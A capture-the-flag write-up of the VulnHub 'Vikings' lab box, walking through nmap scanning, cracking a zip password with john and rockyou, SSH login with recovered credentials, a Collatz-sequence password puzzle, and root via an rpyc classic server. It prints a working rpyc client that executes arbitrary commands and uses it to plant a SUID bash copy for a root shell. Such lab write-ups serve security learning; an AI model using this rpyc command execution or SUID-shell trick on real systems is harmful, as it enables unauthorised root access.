Port scanning

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 14:36 HKT
Nmap scan report for 192.168.56.109
Host is up (0.00057s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:B5:41:94 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.43 seconds
┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 14:37 HKT
Nmap scan report for 192.168.56.109
Host is up (0.00060s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 59:d4:c0:fd:62:45:97:83:15:c0:15:b2:ac:25:60:99 (RSA)
| 256 7e:37:f0:11:63:80:15:a3:d3:9d:43:c6:09:be:fb:da (ECDSA)
|_ 256 52:e9:4f:71:bc:14:dc:00:34:f2:a7:b3:58:b5:0d:ce (ED25519)
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2020-10-29 21:07 site/
|_
|_http-title: Index of /
MAC Address: 08:00:27:B5:41:94 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 5.1 (91%), Linux 2.6.32 - 3.10 (91%), Linux 2.6.32 - 3.13 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.57 seconds

Web

This gives us a /site route. Further directory scanning turns up war.txt, which contains war-is-over/. Visiting that path returns an encoded string; base64-decoding it yields a zip archive, so we crack the archive's password hash.
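Before handing the decoded blob to zip2john it is worth confirming what it actually is and whether its members are even password-protected. The following Python is an added example, not code from the original post: it builds its own small sample archive in memory (a constructed stand-in for the base64 served under war-is-over/), identifies the decoded bytes by magic number, and reads each zip member's encryption flag bit.

```python
"""Identify a base64 blob by magic bytes and, for a zip, list its members
and whether they are encrypted. The sample archive below is constructed
here for demonstration; it is not the archive from the box."""
import base64
import io
import zipfile


def _make_sample_b64():
    """Constructed sample: an unencrypted zip holding one member named 'king'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("king", b"not the real payload")
    return base64.b64encode(buf.getvalue()).decode()


SAMPLE_B64 = _make_sample_b64()

# A few common signatures; extend as needed.
MAGIC = {
    b"PK\x03\x04": "zip",
    b"\x1f\x8b": "gzip",
    b"\x89PNG": "png",
    b"%PDF": "pdf",
    b"\x7fELF": "elf",
}


def identify(data):
    """Return a short file-type label based on the leading magic bytes."""
    for sig, kind in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def inspect_b64(b64_text):
    """Decode base64 (tolerating embedded newlines), identify the result,
    and for a zip report each member's name, size and encryption flag."""
    data = base64.b64decode(b64_text)  # validate=False drops non-alphabet chars
    info = {"kind": identify(data), "size": len(data), "members": []}
    if info["kind"] == "zip":
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for zi in zf.infolist():
                info["members"].append({
                    "name": zi.filename,
                    "size": zi.file_size,
                    # General-purpose bit 0 marks a traditionally encrypted entry.
                    "encrypted": bool(zi.flag_bits & 0x1),
                })
    return info


if __name__ == "__main__":
    result = inspect_b64(SAMPLE_B64)
    print(result["kind"], result["size"], "bytes")
    for m in result["members"]:
        print(f"  {m['name']}: {m['size']} bytes, encrypted={m['encrypted']}")
```

Run it against the real string by replacing SAMPLE_B64 with the page content; if every member reports encrypted=True, zip2john is the right next step, otherwise plain unzip will do.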

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ zip2john 1.zip >hash
┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123 (1.zip/king)
1g 0:00:00:05 DONE (2024-12-07 14:54) 0.1754g/s 53176p/s 53176c/s 53176C/s redsox#1..kweens
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Password obtained: ragnarok123

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ binwalk -e king

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
1429567 0x15D03F Zip archive data, at least v2.0 to extract, compressed size: 53, uncompressed size: 92, name: user

WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

Extraction yields a text file:

┌──(mikannse㉿kali)-[~/vulnhub/vikings/_king.extracted]
└─$ cat user
//FamousBoatbuilder_floki@vikings
//f@m0usboatbuilde7

After some trial and error: floki is the username and the second line is the password, and SSH login works.

Lateral movement

We find a text file called boat that defines num = the 29th prime. A search shows that the collatz-conjecture it mentions is a maths problem: for any positive integer n, if n is even the next term is n/2, and if n is odd the next term is 3n+1. Repeating this eventually reaches 1.

So let's compute: the 29th prime is 109.

To generate the Collatz sequence, grab any script from the web:

print("This is The Collatz Sequence")
user = int(input("Enter a number: "))

def collatz(n):
    print(n)
    while n != 1:
        if n % 2 == 0:
            n = n // 2
            print(n)
        else:
            n = n * 3 + 1
            print(n)

collatz(user)

Write the sequence to a text file:

┌──(mikannse㉿kali)-[~/vulnhub/vikings]
└─$ echo 109 | python 1.py >1.txt

The output still needs a bit of manual cleanup: because stdin is piped, the "Enter a number: " prompt is written to 1.txt without a trailing newline, so the file starts with the banner line followed by "Enter a number: 109". Delete those two lines and put 109 on the first line instead, so the file reads:

109
328
164
82
41
124
...

Following the hint, we need to pick out the printable characters, i.e. treat each number as an ASCII code and keep those that map to printable characters. The printable ASCII range is 32-126.

text = ''
with open('1.txt', 'r') as file:
    for num in file:
        if 32 <= int(num) <= 126:
            text = text + chr(int(num))
print(text)

Result: mR)|>^/Gky[gz=\.F#j5P( (note the backslash between = and . : the sequence passes through 92, which is printable, so it belongs in the password and is easy to lose when copying)
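The three manual steps above (find the 29th prime, walk the Collatz sequence, keep the printable codes) can be done in one script with no prompt cleanup. This is an added example, not the script from the post; it generalises to any prime index and any code range, and reproduces the password from the box, including the backslash that term 92 contributes.

```python
"""Derive the password the way the boat hint describes: start the Collatz
sequence at the n-th prime and keep every term that is printable ASCII."""


def nth_prime(n):
    """Return the n-th prime (1-indexed) by trial division; fine for small n."""
    primes = []
    candidate = 2
    while len(primes) < n:
        if all(candidate % p for p in primes if p * p <= candidate):
            primes.append(candidate)
        candidate += 1
    return primes[-1]


def collatz(n):
    """Return the full Collatz sequence starting at n, including n and the final 1."""
    seq = [n]
    while n != 1:
        n = n // 2 if n % 2 == 0 else 3 * n + 1
        seq.append(n)
    return seq


def printable_chars(values, low=32, high=126):
    """Map every value inside [low, high] to its ASCII character, in order."""
    return "".join(chr(v) for v in values if low <= v <= high)


def derive_password(prime_index=29):
    """Return (starting prime, candidate password) for the given prime index."""
    start = nth_prime(prime_index)
    return start, printable_chars(collatz(start))


if __name__ == "__main__":
    start, password = derive_password()
    print(f"{start} -> {password}")
```

Anything below 32 (the 20, 10, 5, 16, 8, 4, 2, 1 tail) and everything above 126 drops out, which is why the password is much shorter than the sequence.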

That password lets us move laterally to the ragnar user.

Privilege escalation

Nothing useful turns up on the box, so we run pspy.

It shows a process python3 /usr/local/bin/rpyc_classic.py. A quick search shows that an rpyc classic server lets any client execute arbitrary Python on the server side; it is already running and, as the client below assumes, listening on rpyc's default classic-server port 18812.

So all we need to do is connect to the server and have it run commands for us.

A small interactive client script is enough to execute system commands:

import rpyc

def execute_remote_command(conn, command):
    try:
        print(f"Executing command: {command}")

        # Run the command on the remote server
        exit_code = conn.modules.os.system(command)

        print(f"Command executed. Exit code: {exit_code}")

    except Exception as e:
        print(f"An error occurred while executing the command: {e}")

def main():
    try:
        # Connect to the rpyc classic server (default localhost, port 18812)
        conn = rpyc.classic.connect("localhost")
        print("Connected to the rpyc server.")

        while True:
            # Read the command to execute from the user
            command = input("Enter a command to execute on the server (or 'exit' to quit): ").strip()

            if command.lower() == 'exit':
                break

            execute_remote_command(conn, command)

    except ConnectionRefusedError:
        print("Could not connect to the rpyc server. Is it running?")
    except Exception as e:
        print(f"An error occurred: {e}")
    finally:
        if 'conn' in locals() and conn is not None:
            conn.close()
            print("Connection closed.")

if __name__ == "__main__":
    main()

Then run it (the server runs as root, so the SUID copy of bash it creates is root-owned):

$ python3 rpc.py
Connected to the rpyc server.
Enter a command to execute on the server (or 'exit' to quit): cp /bin/bash /tmp/root_bash
Executing command: cp /bin/bash /tmp/root_bash
Command executed. Exit code: 0
Enter a command to execute on the server (or 'exit' to quit): chmod +xs /tmp/root_bash
Executing command: chmod +xs /tmp/root_bash
Command executed. Exit code: 0
Enter a command to execute on the server (or 'exit' to quit): exit
Connection closed.
$ ./root_bash -p
root_bash-4.4# whoami
root

We are root!

Incidentally, the box has a firewall; setting the target port to 80 gets around it.

Afterthoughts

A very misc-flavoured box, a bit bizarre, lol.